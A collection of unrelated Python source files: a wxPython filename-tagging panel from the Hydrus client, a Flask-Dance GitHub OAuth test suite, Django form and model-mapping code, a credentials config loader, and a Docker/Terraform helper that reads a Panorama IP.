self._quick_namespaces_panel = ClientGUICommon.StaticBox( self, 'quick namespaces' )
self._quick_namespaces_list = ClientGUIListCtrl.BetterListCtrl( self._quick_namespaces_panel, 'quick_namespaces', 4, 20, [ ( 'namespace', 12 ), ( 'regex', -1 ) ], self._ConvertQuickRegexDataToListCtrlTuples, delete_key_callback = self.DeleteQuickNamespaces, activation_callback = self.EditQuickNamespaces )
self._add_quick_namespace_button = wx.Button( self._quick_namespaces_panel, label = 'add' )
self._add_quick_namespace_button.Bind( wx.EVT_BUTTON, self.EventAddQuickNamespace )
self._add_quick_namespace_button.SetMinSize( ( 20, -1 ) )
self._edit_quick_namespace_button = wx.Button( self._quick_namespaces_panel, label = 'edit' )
self._edit_quick_namespace_button.Bind( wx.EVT_BUTTON, self.EventEditQuickNamespace )
self._edit_quick_namespace_button.SetMinSize( ( 20, -1 ) )
self._delete_quick_namespace_button = wx.Button( self._quick_namespaces_panel, label = 'delete' )
self._delete_quick_namespace_button.Bind( wx.EVT_BUTTON, self.EventDeleteQuickNamespace )
self._delete_quick_namespace_button.SetMinSize( ( 20, -1 ) )
#
self._regexes_panel = ClientGUICommon.StaticBox( self, 'regexes' )
self._regexes = wx.ListBox( self._regexes_panel )
self._regexes.Bind( wx.EVT_LISTBOX_DCLICK, self.EventRemoveRegex )
self._regex_box = wx.TextCtrl( self._regexes_panel, style=wx.TE_PROCESS_ENTER )
self._regex_box.Bind( wx.EVT_TEXT_ENTER, self.EventAddRegex )
self._regex_shortcuts = ClientGUICommon.RegexButton( self._regexes_panel )
self._regex_intro_link = wx.adv.HyperlinkCtrl( self._regexes_panel, id = -1, label = 'a good regex introduction', url = 'http://www.aivosto.com/vbtips/regex.html' )
self._regex_practise_link = wx.adv.HyperlinkCtrl( self._regexes_panel, id = -1, label = 'regex practise', url = 'http://regexr.com/3cvmf' )
#
self._num_panel = ClientGUICommon.StaticBox( self, '#' )
self._num_base = wx.SpinCtrl( self._num_panel, min = -10000000, max = 10000000, size = ( 60, -1 ) )
self._num_base.SetValue( 1 )
self._num_base.Bind( wx.EVT_SPINCTRL, self.EventRecalcNum )
self._num_step = wx.SpinCtrl( self._num_panel, min = -1000000, max = 1000000, size = ( 60, -1 ) )
self._num_step.SetValue( 1 )
self._num_step.Bind( wx.EVT_SPINCTRL, self.EventRecalcNum )
self._num_namespace = wx.TextCtrl( self._num_panel, size = ( 100, -1 ) )
self._num_namespace.Bind( wx.EVT_TEXT, self.EventNumNamespaceChanged )
if not self._present_for_accompanying_file_list:
self._num_panel.Hide()
#
( quick_namespaces, regexes ) = filename_tagging_options.AdvancedToTuple()
self._quick_namespaces_list.AddDatas( quick_namespaces )
for regex in regexes:
self._regexes.Append( regex )
#
button_box = wx.BoxSizer( wx.HORIZONTAL )
button_box.Add( self._add_quick_namespace_button, CC.FLAGS_EXPAND_BOTH_WAYS )
button_box.Add( self._edit_quick_namespace_button, CC.FLAGS_EXPAND_BOTH_WAYS )
button_box.Add( self._delete_quick_namespace_button, CC.FLAGS_EXPAND_BOTH_WAYS )
self._quick_namespaces_panel.Add( self._quick_namespaces_list, CC.FLAGS_EXPAND_BOTH_WAYS )
self._quick_namespaces_panel.Add( button_box, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
#
self._regexes_panel.Add( self._regexes, CC.FLAGS_EXPAND_BOTH_WAYS )
self._regexes_panel.Add( self._regex_box, CC.FLAGS_EXPAND_PERPENDICULAR )
self._regexes_panel.Add( self._regex_shortcuts, CC.FLAGS_LONE_BUTTON )
self._regexes_panel.Add( self._regex_intro_link, CC.FLAGS_LONE_BUTTON )
self._regexes_panel.Add( self._regex_practise_link, CC.FLAGS_LONE_BUTTON )
#
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( wx.StaticText( self._num_panel, label = '# base/step: ' ), CC.FLAGS_VCENTER )
hbox.Add( self._num_base, CC.FLAGS_VCENTER )
hbox.Add( self._num_step, CC.FLAGS_VCENTER )
self._num_panel.Add( hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( wx.StaticText( self._num_panel, label = '# namespace: ' ), CC.FLAGS_VCENTER )
hbox.Add( self._num_namespace, CC.FLAGS_EXPAND_BOTH_WAYS )
self._num_panel.Add( hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
second_vbox = wx.BoxSizer( wx.VERTICAL )
second_vbox.Add( self._regexes_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
second_vbox.Add( self._num_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
#
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( self._quick_namespaces_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
hbox.Add( second_vbox, CC.FLAGS_EXPAND_SIZER_BOTH_WAYS )
self.SetSizer( hbox )
def _ConvertQuickRegexDataToListCtrlTuples( self, data ):
( namespace, regex ) = data
display_tuple = ( namespace, regex )
sort_tuple = ( namespace, regex )
return ( display_tuple, sort_tuple )
def DeleteQuickNamespaces( self ):
import ClientGUIDialogs
with ClientGUIDialogs.DialogYesNo( self, 'Remove all selected?' ) as dlg:
if dlg.ShowModal() == wx.ID_YES:
self._quick_namespaces_list.DeleteSelected()
self._refresh_callable()
def EditQuickNamespaces( self ):
data_to_edit = self._quick_namespaces_list.GetData( only_selected = True )
for old_data in data_to_edit:
( namespace, regex ) = old_data
import ClientGUIDialogs
with ClientGUIDialogs.DialogInputNamespaceRegex( self, namespace = namespace, regex = regex ) as dlg:
if dlg.ShowModal() == wx.ID_OK:
( new_namespace, new_regex ) = dlg.GetInfo()
new_data = ( new_namespace, new_regex )
if new_data != old_data:
self._quick_namespaces_list.DeleteDatas( ( old_data, ) )
self._quick_namespaces_list.AddDatas( ( new_data, ) )
self._refresh_callable()
def EventAddRegex( self, event ):
regex = self._regex_box.GetValue()
if regex != '':
try:
re.compile( regex, flags = re.UNICODE )
except Exception as e:
text = 'That regex would not compile!'
text += os.linesep * 2
text += HydrusData.ToUnicode( e )
wx.MessageBox( text )
return
self._regexes.Append( regex )
self._regex_box.Clear()
self._refresh_callable()
def EventAddQuickNamespace( self, event ):
import ClientGUIDialogs
with ClientGUIDialogs.DialogInputNamespaceRegex( self ) as dlg:
if dlg.ShowModal() == wx.ID_OK:
( namespace, regex ) = dlg.GetInfo()
data = ( namespace, regex )
self._quick_namespaces_list.AddDatas( ( data, ) )
self._refresh_callable()
def EventDeleteQuickNamespace( self, event ):
self.DeleteQuickNamespaces()
def EventEditQuickNamespace( self, event ):
self.EditQuickNamespaces()
def EventNumNamespaceChanged( self, event ):
self._refresh_callable()
def EventRecalcNum( self, event ):
self._refresh_callable()
def EventRemoveRegex( self, event ):
selection = self._regexes.GetSelection()
if selection != wx.NOT_FOUND:
if len( self._regex_box.GetValue() ) == 0: self._regex_box.SetValue( self._regexes.GetString( selection ) )
self._regexes.Delete( selection )
self._refresh_callable()
def GetTags( self, index, path ):
tags = set()
num_namespace = self._num_namespace.GetValue()
if num_namespace != '':
num_base = self._num_base.GetValue()
num_step = self._num_step.GetValue()
tag_num = num_base + index * num_step
tags.add( num_namespace + ':' + str( tag_num ) )
return tags
def UpdateFilenameTaggingOptions( self, filename_tagging_options ):
quick_namespaces = self._quick_namespaces_list.GetData()
regexes = self._regexes.GetStrings()
filename_tagging_options.AdvancedSetTuple( quick_namespaces, regexes )
class _SimplePanel( wx.Panel ):
def __init__( self, parent, service_key, refresh_callable, filename_tagging_options, present_for_accompanying_file_list ):
wx.Panel.__init__( self, parent )
self._service_key = service_key
self._refresh_callable = refresh_callable
self._present_for_accompanying_file_list = present_for_accompanying_file_list
#
self._tags_panel = ClientGUICommon.StaticBox( self, 'tags for all' )
self._tags = ClientGUIListBoxes.ListBoxTagsStringsAddRemove( self._tags_panel, self._service_key, self.TagsRemoved )
expand_parents = True
self._tag_box = ClientGUIACDropdown.AutoCompleteDropdownTagsWrite( self._tags_panel, self.EnterTags, expand_parents, CC.LOCAL_FILE_SERVICE_KEY, service_key )
self._tags_paste_button = ClientGUICommon.BetterButton( self._tags_panel, 'paste tags', self._PasteTags )
#
self._single_tags_panel = ClientGUICommon.StaticBox( self, 'tags just for selected files' )
self._paths_to_single_tags = collections.defaultdict( set )
self._single_tags = ClientGUIListBoxes.ListBoxTagsStringsAddRemove( self._single_tags_panel, self._service_key, self.SingleTagsRemoved )
self._single_tags_paste_button = ClientGUICommon.BetterButton( self._single_tags_panel, 'paste tags', self._PasteSingleTags )
expand_parents = True
self._single_tag_box = ClientGUIACDropdown.AutoCompleteDropdownTagsWrite( self._single_tags_panel, self.EnterTagsSingle, expand_parents, CC.LOCAL_FILE_SERVICE_KEY, service_key )
self.SetSelectedPaths( [] )
if not self._present_for_accompanying_file_list:
self._single_tags_panel.Hide()
#
self._checkboxes_panel = ClientGUICommon.StaticBox( self, 'misc' )
self._load_from_txt_files_checkbox = wx.CheckBox( self._checkboxes_panel, label = 'try to load tags from neighbouring .txt files' )
txt_files_help_button = ClientGUICommon.BetterBitmapButton( self._checkboxes_panel, CC.GlobalBMPs.help, self._ShowTXTHelp )
txt_files_help_button.SetToolTip( 'Show help regarding importing tags from .txt files.' )
self._filename_namespace = wx.TextCtrl( self._checkboxes_panel )
self._filename_namespace.SetMinSize( ( 100, -1 ) )
self._filename_checkbox = wx.CheckBox( self._checkboxes_panel, label = 'add filename? [namespace]' )
self._dir_namespace_1 = wx.TextCtrl( self._checkboxes_panel )
self._dir_namespace_1.SetMinSize( ( 100, -1 ) )
self._dir_checkbox_1 = wx.CheckBox( self._checkboxes_panel, label = 'add first directory? [namespace]' )
self._dir_namespace_2 = wx.TextCtrl( self._checkboxes_panel )
self._dir_namespace_2.SetMinSize( ( 100, -1 ) )
self._dir_checkbox_2 = wx.CheckBox( self._checkboxes_panel, label = 'add second directory? [namespace]' )
self._dir_namespace_3 = wx.TextCtrl( self._checkboxes_panel )
self._dir_namespace_3.SetMinSize( ( 100, -1 ) )
self._dir_checkbox_3 = wx.CheckBox( self._checkboxes_panel, label = 'add third directory? [namespace]' )
#
( tags_for_all, load_from_neighbouring_txt_files, add_filename, add_first_directory, add_second_directory, add_third_directory ) = filename_tagging_options.SimpleToTuple()
self._tags.AddTags( tags_for_all )
self._load_from_txt_files_checkbox.SetValue( load_from_neighbouring_txt_files )
( add_filename_boolean, add_filename_namespace ) = add_filename
self._filename_checkbox.SetValue( add_filename_boolean )
self._filename_namespace.SetValue( add_filename_namespace )
( dir_1_boolean, dir_1_namespace ) = add_first_directory
self._dir_checkbox_1.SetValue( dir_1_boolean )
self._dir_namespace_1.SetValue( dir_1_namespace )
( dir_2_boolean, dir_2_namespace ) = add_second_directory
self._dir_checkbox_2.SetValue( dir_2_boolean )
self._dir_namespace_2.SetValue( dir_2_namespace )
( dir_3_boolean, dir_3_namespace ) = add_third_directory
self._dir_checkbox_3.SetValue( dir_3_boolean )
self._dir_namespace_3.SetValue( dir_3_namespace )
#
self._tags_panel.Add( self._tags, CC.FLAGS_EXPAND_BOTH_WAYS )
self._tags_panel.Add( self._tag_box, CC.FLAGS_EXPAND_PERPENDICULAR )
self._tags_panel.Add( self._tags_paste_button, CC.FLAGS_EXPAND_PERPENDICULAR )
self._single_tags_panel.Add( self._single_tags, CC.FLAGS_EXPAND_BOTH_WAYS )
self._single_tags_panel.Add( self._single_tag_box, CC.FLAGS_EXPAND_PERPENDICULAR )
self._single_tags_panel.Add( self._single_tags_paste_button, CC.FLAGS_EXPAND_PERPENDICULAR )
txt_hbox = wx.BoxSizer( wx.HORIZONTAL )
txt_hbox.Add( self._load_from_txt_files_checkbox, CC.FLAGS_EXPAND_BOTH_WAYS )
txt_hbox.Add( txt_files_help_button, CC.FLAGS_VCENTER )
filename_hbox = wx.BoxSizer( wx.HORIZONTAL )
filename_hbox.Add( self._filename_checkbox, CC.FLAGS_VCENTER )
filename_hbox.Add( self._filename_namespace, CC.FLAGS_EXPAND_BOTH_WAYS )
dir_hbox_1 = wx.BoxSizer( wx.HORIZONTAL )
dir_hbox_1.Add( self._dir_checkbox_1, CC.FLAGS_VCENTER )
dir_hbox_1.Add( self._dir_namespace_1, CC.FLAGS_EXPAND_BOTH_WAYS )
dir_hbox_2 = wx.BoxSizer( wx.HORIZONTAL )
dir_hbox_2.Add( self._dir_checkbox_2, CC.FLAGS_VCENTER )
dir_hbox_2.Add( self._dir_namespace_2, CC.FLAGS_EXPAND_BOTH_WAYS )
dir_hbox_3 = wx.BoxSizer( wx.HORIZONTAL )
dir_hbox_3.Add( self._dir_checkbox_3, CC.FLAGS_VCENTER )
dir_hbox_3.Add( self._dir_namespace_3, CC.FLAGS_EXPAND_BOTH_WAYS )
self._checkboxes_panel.Add( txt_hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( filename_hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( dir_hbox_1, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( dir_hbox_2, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( dir_hbox_3, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( self._tags_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
hbox.Add( self._single_tags_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
hbox.Add( self._checkboxes_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
self.SetSizer( hbox )
#
self._load_from_txt_files_checkbox.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._filename_namespace.Bind( wx.EVT_TEXT, self.EventRefresh )
self._filename_checkbox.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._dir_namespace_1.Bind( wx.EVT_TEXT, self.EventRefresh )
self._dir_checkbox_1.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._dir_namespace_2.Bind( wx.EVT_TEXT, self.EventRefresh )
self._dir_checkbox_2.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._dir_namespace_3.Bind( wx.EVT_TEXT, self.EventRefresh )
self._dir_checkbox_3.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
def _GetTagsFromClipboard( self ):
text = HG.client_controller.GetClipboardText()
try:
tags = HydrusText.DeserialiseNewlinedTexts( text )
tags = HydrusTags.CleanTags( tags )
return tags
except:
raise Exception( 'I could not understand what was in the clipboard' )
def _PasteTags( self ):
try:
tags = self._GetTagsFromClipboard()
except Exception as e:
wx.MessageBox( HydrusData.ToUnicode( e ) )
return
self.EnterTags( tags )
def _PasteSingleTags( self ):
try:
tags = self._GetTagsFromClipboard()
except Exception as e:
wx.MessageBox( HydrusData.ToUnicode( e ) )
return
self.EnterTagsSingle( tags )
def _ShowTXTHelp( self ):
message = 'If you would like to add custom tags with your files, add a .txt file beside the file like so:'
message += os.linesep * 2
message += 'my_file.jpg'
message += os.linesep
message += 'my_file.jpg.txt'
message += os.linesep * 2
message += 'And include your tags inside the .txt file in a newline-separated list (if you know how to script, generating these files automatically from another source of tags can save a lot of time!).'
message += os.linesep * 2
message += 'Make sure you preview the results in the table above to be certain everything is parsing correctly. Until you are comfortable with this, you should test it on just one or two files.'
wx.MessageBox( message )
def EnterTags( self, tags ):
tag_parents_manager = HG.client_controller.GetManager( 'tag_parents' )
parents = set()
for tag in tags:
some_parents = tag_parents_manager.GetParents( self._service_key, tag )
parents.update( some_parents )
if len( tags ) > 0:
self._tags.AddTags( tags )
self._tags.AddTags( parents )
self._refresh_callable()
def EnterTagsSingle( self, tags ):
tag_parents_manager = HG.client_controller.GetManager( 'tag_parents' )
parents = set()
for tag in tags:
some_parents = tag_parents_manager.GetParents( self._service_key, tag )
parents.update( some_parents )
if len( tags ) > 0:
self._single_tags.AddTags( tags )
self._single_tags.AddTags( parents )
for path in self._selected_paths:
current_tags = self._paths_to_single_tags[ path ]
current_tags.update( tags )
current_tags.update( parents )
self._refresh_callable()
def EventRefresh( self, event ):
self._refresh_callable()
def GetTags( self, index, path ):
tags = set()
if path in self._paths_to_single_tags:
tags.update( self._paths_to_single_tags[ path ] )
return tags
def SingleTagsRemoved( self, tags ):
for path in self._selected_paths:
current_tags = self._paths_to_single_tags[ path ]
current_tags.difference_update( tags )
self._refresh_callable()
def SetSelectedPaths( self, paths ):
self._selected_paths = paths
single_tags = set()
if len( paths ) > 0:
for path in self._selected_paths:
if path in self._paths_to_single_tags:
single_tags.update( self._paths_to_single_tags[ path ] )
self._single_tag_box.Enable()
self._single_tags_paste_button.Enable()
else:
self._single_tag_box.Disable()
self._single_tags_paste_button.Disable()
self._single_tags.SetTags( single_tags )
def TagsRemoved( self, tag ):
self._refresh_callable()
def UpdateFilenameTaggingOptions( self, filename_tagging_options ):
tags_for_all = self._tags.GetTags()
load_from_neighbouring_txt_files = self._load_from_txt_files_checkbox.GetValue()
add_filename_boolean = self._filename_checkbox.GetValue()
add_filename_namespace = self._filename_namespace.GetValue()
add_filename = ( add_filename_boolean, add_filename_namespace )
dir_1_boolean = self._dir_checkbox_1.GetValue()
dir_1_namespace = self._dir_namespace_1.GetValue()
add_first_directory = ( dir_1_boolean, dir_1_namespace )
dir_2_boolean = self._dir_checkbox_2.GetValue()
dir_2_namespace = self._dir_namespace_2.GetValue()
add_second_directory = ( dir_2_boolean, dir_2_namespace )
dir_3_boolean = self._dir_checkbox_3.GetValue()
dir_3_namespace = self._dir_namespace_3.GetValue()
add_third_directory = ( dir_3_boolean, dir_3_namespace )
filename_tagging_options.SimpleSetTuple( tags_for_all, load_from_neighbouring_txt_files, add_filename, add_first_directory, add_second_directory, add_third_directory )
class EditLocalImportFilenameTaggingPanel( ClientGUIScrolledPanels.EditPanel ):
def __init__( self, parent, paths ):
ClientGUIScrolledPanels.EditPanel.__init__( self, parent )
self._paths = paths
self._tag_repositories = ClientGUICommon.ListBook( self )
#
services = HG.client_controller.services_manager.GetServices( ( HC.TAG_REPOSITORY, ) )
for service in services:
if service.HasPermission( HC.CONTENT_TYPE_MAPPINGS, HC.PERMISSION_ACTION_CREATE ):
service_key = service.GetServiceKey()
name = service.GetName()
self._tag_repositories.AddPageArgs( name, service_key, self._Panel, ( self._tag_repositories, service_key, paths ), {} )
page = self._Panel( self._tag_repositories, CC.LOCAL_TAG_SERVICE_KEY, paths )
name = CC.LOCAL_TAG_SERVICE_KEY
self._tag_repositories.AddPage( name, name, page )
default_tag_repository_key = HC.options[ 'default_tag_repository' ]
self._tag_repositories.Select( default_tag_repository_key )
#
vbox = wx.BoxSizer( wx.VERTICAL )
vbox.Add( self._tag_repositories, CC.FLAGS_EXPAND_BOTH_WAYS )
self.SetSizer( vbox )
def GetValue( self ):
paths_to_tags = collections.defaultdict( dict )
for page in self._tag_repositories.GetActivePages():
( service_key, page_of_paths_to_tags ) = page.GetInfo()
for ( path, tags ) in page_of_paths_to_tags.items(): paths_to_tags[ path ][ service_key ] = tags
return paths_to_tags
class _Panel( wx.Panel ):
def __init__( self, parent, service_key, paths ):
wx.Panel.__init__( self, parent )
self._service_key = service_key
self._paths = paths
self._paths_list = ClientGUIListCtrl.BetterListCtrl( self, 'paths_to_tags', 25, 40, [ ( '#', 4 ), ( 'path', 40 ), ( 'tags', -1 ) ], self._ConvertDataToListCtrlTuples )
self._paths_list.Bind( wx.EVT_LIST_ITEM_SELECTED, self.EventItemSelected )
self._paths_list.Bind( wx.EVT_LIST_ITEM_DESELECTED, self.EventItemSelected )
#
self._filename_tagging_panel = FilenameTaggingOptionsPanel( self, self._service_key, self.ScheduleRefreshFileList, present_for_accompanying_file_list = True )
self._schedule_refresh_file_list_job = None
#
# i.e. ( index, path )
self._paths_list.AddDatas( list( enumerate( self._paths ) ) )
#
vbox = wx.BoxSizer( wx.VERTICAL )
vbox.Add( self._paths_list, CC.FLAGS_EXPAND_BOTH_WAYS )
vbox.Add( self._filename_tagging_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
self.SetSizer( vbox )
def _ConvertDataToListCtrlTuples( self, data ):
( index, path ) = data
tags = self._GetTags( index, path )
pretty_index = HydrusData.ConvertIntToPrettyString( index + 1 )
pretty_path = path
pretty_tags = ', '.join( tags )
display_tuple = ( pretty_index, pretty_path, pretty_tags )
sort_tuple = ( index, path, tags )
return ( display_tuple, sort_tuple )
def _GetTags( self, index, path ):
filename_tagging_options = self._filename_tagging_panel.GetFilenameTaggingOptions()
tags = filename_tagging_options.GetTags( self._service_key, path )
tags.update( self._filename_tagging_panel.GetTags( index, path ) )
tags = list( tags )
tags.sort()
return tags
def EventItemSelected( self, event ):
paths = [ path for ( index, path ) in self._paths_list.GetData( only_selected = True ) ]
self._filename_tagging_panel.SetSelectedPaths( paths )
event.Skip()
def GetInfo( self ):
paths_to_tags = { path : self._GetTags( index, path ) for ( index, path ) in self._paths_list.GetData() }
return ( self._service_key, paths_to_tags )
def RefreshFileList( self ):
self._paths_list.UpdateDatas()
def ScheduleRefreshFileList( self ):
if self._schedule_refresh_file_list_job is not None:
self._schedule_refresh_file_list_job.Cancel()
self._schedule_refresh_file_list_job = None
self._schedule_refresh_file_list_job = HG.client_controller.CallLaterWXSafe( self, 0.5, self.RefreshFileList )
class EditFilenameTaggingOptionPanel( ClientGUIScrolledPanels.EditPanel ):
def __init__( self, parent, service_key, filename_tagging_options ):
ClientGUIScrolledPanels.EditPanel.__init__( self, parent )
self._service_key = service_key
self._example_path_input = wx.TextCtrl( self )
self._example_output = wx.TextCtrl( self )
self._filename_tagging_options_panel = FilenameTaggingOptionsPanel( self, self._service_key, self.ScheduleRefreshTags, filename_tagging_options = filename_tagging_options, present_for_accompanying_file_list = False )
self._schedule_refresh_tags_job = None
#
self._example_path_input.SetValue( 'enter example path here' )
self._example_output.Disable()
#
vbox = wx.BoxSizer( wx.VERTICAL )
vbox.Add( self._example_path_input, CC.FLAGS_EXPAND_PERPENDICULAR )
vbox.Add( self._example_output, CC.FLAGS_EXPAND_PERPENDICULAR )
vbox.Add( self._filename_tagging_options_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
self.SetSizer( vbox )
#
self._example_path_input.Bind( wx.EVT_TEXT, self.EventText )
def EventText( self, event ):
self.ScheduleRefreshTags()
def GetValue( self ):
return self._filename_tagging_options_panel.GetFilenameTaggingOptions()
def RefreshTags( self ):
example_path_input = self._example_path_input.GetValue()
filename_tagging_options = self.GetValue()
try:
tags = filename_tagging_options.GetTags( self._service_key, example_path_input )
except:
tags = [ 'could not parse' ]
self._example_output.SetValue( ', '.join( tags ) )
def ScheduleRefreshTags( self ):
if self._schedule_refresh_tags_job is not None:
self._schedule_refresh_tags_job.Cancel()
self._schedule_refresh_tags_job = None
self._schedule_refresh_tags_job = HG.client_controller.CallLaterWXSafe( self, 0.5, self.RefreshTags )
class TagImportOptionsButton( ClientGUICommon.BetterButton ):
def __init__( self, parent, namespaces, tag_import_options, update_callable = None, show_url_options = True ):
ClientGUICommon.BetterButton.__init__( self, parent, 'tag import options', self._EditOptions )
self._namespaces = namespaces
self._tag_import_options = tag_import_options
self._update_callable = update_callable
self._show_url_options = show_url_options
self._SetToolTip()
def _EditOptions( self ):
with ClientGUITopLevelWindows.DialogEdit( self, 'edit tag import options' ) as dlg:
panel = ClientGUIScrolledPanelsEdit.EditTagImportOptionsPanel( dlg, self._namespaces, self._tag_import_options, show_url_options = self._show_url_options )
dlg.SetPanel( panel )
if dlg.ShowModal() == wx.ID_OK:
tag_import_options = panel.GetValue()
self._SetValue( tag_import_options )
def _SetToolTip( self ):
self.SetToolTip( self._tag_import_options.GetSummary( self._show_url_options ) )
def _SetValue( self, tag_import_options ):
self._tag_import_options = tag_import_options
self._SetToolTip()
if self._update_callable is not None:
self._update_callable( self._tag_import_options )
def GetValue( self ):
return self._tag_import_options
def SetNamespaces( self, namespaces ):
self._namespaces = namespaces
def SetValue( self, tag_import_options ):
self._SetValue( tag_import_options )
|
from __future__ import unicode_literals
import pytest
import responses
from urlobject import URLObject
from flask import Flask
from flask_dance.contrib.github import make_github_blueprint, github
from flask_dance.consumer import OAuth2ConsumerBlueprint
from flask_dance.consumer.storage import MemoryStorage
@pytest.fixture
def make_app():
"A callable to create a Flask app with the GitHub provider"
def _make_app(*args, **kwargs):
app = Flask(__name__)
app.secret_key = "whatever"
blueprint = make_github_blueprint(*args, **kwargs)
app.register_blueprint(blueprint)
return app
return _make_app
def test_blueprint_factory():
github_bp = make_github_blueprint(
client_id="foo", client_secret="bar", scope="user:email", redirect_to="index"
)
assert isinstance(github_bp, OAuth2ConsumerBlueprint)
assert github_bp.session.scope == "user:email"
assert github_bp.session.base_url == "https://api.github.com/"
assert github_bp.session.client_id == "foo"
assert github_bp.client_secret == "bar"
assert github_bp.authorization_url == "https://github.com/login/oauth/authorize"
assert github_bp.token_url == "https://github.com/login/oauth/access_token"
def test_load_from_config(make_app):
app = make_app()
app.config["GITHUB_OAUTH_CLIENT_ID"] = "foo"
app.config["GITHUB_OAUTH_CLIENT_SECRET"] = "bar"
resp = app.test_client().get("/github")
url = resp.headers["Location"]
client_id = URLObject(url).query.dict.get("client_id")
assert client_id == "foo"
@responses.activate
def test_context_local(make_app):
responses.add(responses.GET, "https://google.com")
# set up two apps with two different set of auth tokens
app1 = make_app(
"foo1",
"bar1",
redirect_to="url1",
storage=MemoryStorage({"access_token": "app1"}),
)
app2 = make_app(
"foo2",
"bar2",
redirect_to="url2",
storage=MemoryStorage({"access_token": "app2"}),
)
# outside of a request context, referencing functions on the `github` object
# will raise an exception
with pytest.raises(RuntimeError):
github.get("https://google.com")
# inside of a request context, `github` should be a proxy to the correct
# blueprint session
with app1.test_request_context("/"):
app1.preprocess_request()
github.get("https://google.com")
request = responses.calls[0].request
assert request.headers["Authorization"] == "Bearer app1"
with app2.test_request_context("/"):
app2.preprocess_request()
github.get("https://google.com")
request = responses.calls[1].request
assert request.headers["Authorization"] == "Bearer app2"
|
from datetime import datetime
from django.contrib.sessions.backends import file
from mutant.contrib.boolean.models import NullBooleanFieldDefinition
from mutant.contrib.file.models import FilePathFieldDefinition
from mutant.contrib.numeric.models import FloatFieldDefinition, BigIntegerFieldDefinition
from mutant.contrib.temporal.models import DateTimeFieldDefinition
from mutant.contrib.text.models import TextFieldDefinition
ATTRIBUTE_TYPES = {
str: TextFieldDefinition,
float: FloatFieldDefinition,
bool: NullBooleanFieldDefinition,
int: BigIntegerFieldDefinition,
file: FilePathFieldDefinition,
datetime: DateTimeFieldDefinition,
# ('varchar', mutant.contrib.text.models.CharFieldDefinition),
#
# ('integer', mutant.contrib.numeric.models.BigIntegerFieldDefinition),
# ('small_integer', mutant.contrib.numeric.models.SmallIntegerFieldDefinition),
# ('float', mutant.contrib.numeric.models.FloatFieldDefinition),
#
# ('null_boolean', mutant.contrib.boolean.models.NullBooleanFieldDefinition),
# ('boolean', mutant.contrib.boolean.models.BooleanFieldDefinition),
#
# ('file', mutant.contrib.file.models.FilePathFieldDefinition),
#
# ('foreign_key', mutant.contrib.related.models.ForeignKeyDefinition),
# ('one_to_one', mutant.contrib.related.models.OneToOneFieldDefinition),
# ('many_to_many', mutant.contrib.related.models.ManyToManyFieldDefinition),
#
# ('ip_generic', mutant.contrib.web.models.GenericIPAddressFieldDefinition),
# ('ip', mutant.contrib.web.models.IPAddressFieldDefinition),
# ('email', mutant.contrib.web.models.EmailFieldDefinition),
# ('url', mutant.contrib.web.models.URLFieldDefinition),
#
# ('date', mutant.contrib.temporal.models.DateFieldDefinition),
# ('time', mutant.contrib.temporal.models.TimeFieldDefinition),
# ('datetime', mutant.contrib.temporal.models.DateTimeFieldDefinition),
}
|
import os
import sys
import json
def get_config_parser():
if sys.version_info[0] == 3:
from configparser import ConfigParser
return ConfigParser
else:
import ConfigParser
return ConfigParser.ConfigParser
ConfigParser = get_config_parser()
config = ConfigParser()
config.read('credentials.ini')
USERNAME = config.get('Credentials', 'USERNAME')
EXTENSION = config.get('Credentials', 'EXTENSION')
PASSWORD = config.get('Credentials', 'PASSWORD')
APP_KEY = config.get('Credentials', 'APP_KEY')
APP_SECRET = config.get('Credentials', 'APP_SECRET')
SERVER = config.get('Credentials', 'SERVER')
MOBILE = config.get('Credentials', 'MOBILE') |
from __future__ import absolute_import, unicode_literals
import logging
from django import forms
from django.utils.translation import ugettext_lazy as _
from acls.models import AccessControlList
from .models import Folder
logger = logging.getLogger(__name__)
class FolderListForm(forms.Form):
def __init__(self, *args, **kwargs):
help_text = kwargs.pop('help_text', None)
permission = kwargs.pop('permission', None)
queryset = kwargs.pop('queryset', Folder.objects.all())
user = kwargs.pop('user', None)
logger.debug('user: %s', user)
super(FolderListForm, self).__init__(*args, **kwargs)
queryset = AccessControlList.objects.filter_by_access(
permission, user, queryset=queryset
)
self.fields['folders'] = forms.ModelMultipleChoiceField(
label=_('Folders'), help_text=help_text,
queryset=queryset, required=False,
widget=forms.SelectMultiple(attrs={'class': 'select2'})
)
|
import sys
import os
import socket
import json
from pathlib import Path
from docker import DockerClient
# Pull in the AWS Provider variables. These are set in Panhandler's skillet environment and are hidden variables so the
# user doesn't need to adjust them everytime
variables = dict(TF_IN_AUTOMATION='True', HOME='/home/terraform')
client = DockerClient()
path = Path(os.getcwd())
wdir = str(path.parents[0])+"/terraform/azure/panorama/"
# Capture the External IP address of Panorama from the Terraform output
eip = json.loads(client.containers.run('paloaltonetworks/terraform-azure', 'terraform output -json -no-color', auto_remove=True,
volumes={'terraform-azure': {'bind': '/home/terraform/.azure/', 'mode': 'rw'}},
volumes_from=socket.gethostname(), working_dir=wdir, user=os.getuid(),
environment=variables).decode('utf-8'))
panorama_ip = (eip['primary_eip']['value'])
